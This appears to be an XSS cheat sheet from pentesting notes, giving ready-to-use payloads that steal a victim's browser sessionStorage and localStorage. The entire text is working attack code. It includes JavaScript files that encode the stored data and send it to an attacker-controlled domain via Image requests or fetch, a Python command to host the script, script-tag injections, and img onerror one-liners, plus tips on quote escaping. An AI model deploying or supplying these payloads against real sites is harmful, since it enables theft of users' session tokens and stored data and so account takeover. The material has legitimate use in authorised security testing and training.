SessionStorage
(data is kept only until tab is closed)
Hosting method:
- First create a file name sessionstorage.js with the following content:
let data = JSON.stringify(sessionStorage) let encodedData = btoa(data) new Image().src = "http://domain/?ss=" + encodedData; -
Host the file using Python:
python3 -m http.server 80 -
Inject the payload:
<script src="http://ownIP/sessionstorage.js"></script> - Previous code on sessionstorage.js:
let data = JSON.stringify(sessionStorage) let encodedData = encodeURIComponent(data) fetch("http://domain/?ss=" + encodedData)
One liner alternative:
-
Replace domain with domain you control:
<img src="x" onerror="fetch('http://domain/ls=?'+encodeURIComponent(JSON.stringify(sessionStorage)))"> -
Note that can use either single quote or a backslash to escape the double quotes inside double quotes. Also if in URL need to encode the plus using %2b.
LocalStorage
(data is kept until it is explicitly deleted)
Hosting method:
- First create a file name localstorage.js with the following content:
let data = JSON.stringify(localStorage) let encodedData = btoa(data) new Image().src = "http://domain/?ls=" + encodedData; -
Host the file using Python:
python3 -m http.server 80 -
Inject the payload:
<script src=http://ownIP/localstorage.js></script> - Previous localstorage.js:
let data = JSON.stringify(localStorage) let encodedData = encodeURIComponent(data) fetch("http://domain/?ls=" + encodedData)
One liner alternative:
-
Replace domain with domain you control:
<img src="x" onerror="fetch('http://domain/ls=?'+encodeURIComponent(JSON.stringify(localStorage)))"> -
Note that can use either single quote or a backslash to escape the double quotes inside double quotes. Also if in URL need to encode the plus using %2b.